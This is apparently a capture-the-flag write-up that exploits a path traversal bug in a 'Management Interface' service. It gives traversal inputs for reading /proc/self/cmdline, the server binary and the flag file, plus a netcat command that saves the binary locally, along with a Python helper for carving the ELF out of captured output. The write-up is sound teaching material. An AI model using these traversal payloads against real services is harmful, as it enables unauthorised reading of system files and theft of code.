Examining the patch notes shows that although the path traversal vulnerability was patched in v0.2, the fix was rolled back in v0.3.
Let's try it:
```
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
2
The following patchnotes were found:
- Version0.3
- Version0.2
Which patchnotes should be shown?
../../../../../proc/self/cmdline
./main
```
So our binary is named `main`. Hopefully we can just print its contents the same way.
```
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
2
The following patchnotes were found:
- Version0.3
- Version0.2
Which patchnotes should be shown?
../main
```
We have to redirect the output to a file and then remove the additional data added by the application (menu etc.):
```
printf "2\n../main\n3\n" | nc mngmnt-iface.ctfcompetition.com 1337 > output.bin
```
(Open output.bin in any notepad or hex editor and remove everything before `\x7fELF` and after the last series of null bytes at the end.)
This way we get a copy of the binary running on the server.
When we open it in IDA, we can see that the application reads the password from the file `flag`. Let's cat it.
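The manual trimming step can also be scripted. The following is an added example, not part of the original writeup: it finds the `\x7fELF` magic and uses the ELF64 header fields `e_shoff`, `e_shentsize` and `e_shnum` to compute where the image ends. It assumes a 64-bit little-endian binary whose section header table is the last thing in the file (the usual linker layout); the sample bytes are constructed, not the real binary.

```python
import struct

ELF_MAGIC = b"\x7fELF"

def carve_elf64(capture: bytes) -> bytes:
    """Return the ELF image embedded in capture, without surrounding menu text."""
    start = capture.find(ELF_MAGIC)
    if start < 0:
        raise ValueError("no ELF magic in capture")
    hdr = capture[start:start + 64]
    # e_ident[4] == 2 means ELFCLASS64, e_ident[5] == 1 means little-endian
    if len(hdr) < 64 or hdr[4] != 2 or hdr[5] != 1:
        raise ValueError("need a complete 64-bit little-endian ELF header")
    (e_shoff,) = struct.unpack_from("<Q", hdr, 0x28)
    e_shentsize, e_shnum = struct.unpack_from("<HH", hdr, 0x3A)
    if e_shoff == 0 or e_shnum == 0:
        raise ValueError("no section header table; trim by hand instead")
    # Assumption: the section header table is the final structure in the file.
    size = e_shoff + e_shentsize * e_shnum
    if start + size > len(capture):
        raise ValueError("capture is shorter than the ELF header claims")
    return capture[start:start + size]

def build_sample_elf() -> bytes:
    """Constructed 208-byte stand-in: header, 16 filler bytes, 2 empty section headers."""
    hdr = bytearray(64)
    hdr[0:4] = ELF_MAGIC
    hdr[4], hdr[5] = 2, 1
    struct.pack_into("<Q", hdr, 0x28, 80)        # e_shoff
    struct.pack_into("<HH", hdr, 0x3A, 64, 2)    # e_shentsize, e_shnum
    return bytes(hdr) + b"\x90" * 16 + b"\x00" * 128

# Menu text as shown in the transcripts above, surrounding the file contents.
MENU = (b"=== Management Interface ===\n 1) Service access\n"
        b" 2) Read EULA/patch notes\n 3) Quit\n")
PROMPT = (b"The following patchnotes were found:\n - Version0.3\n - Version0.2\n"
          b"Which patchnotes should be shown?\n")

if __name__ == "__main__":
    sample = build_sample_elf()
    capture = MENU + PROMPT + sample + MENU
    carved = carve_elf64(capture)
    print(len(capture), "->", len(carved), "bytes, intact:", carved == sample)
```

For the real capture, pass the bytes of `output.bin` to `carve_elf64` and write the result to a new file.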
```
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
2
The following patchnotes were found:
- Version0.3
- Version0.2
Which patchnotes should be shown?
../flag
CTF{I_luv_buggy_sOFtware}
```
Flag: `CTF{I_luv_buggy_sOFtware}`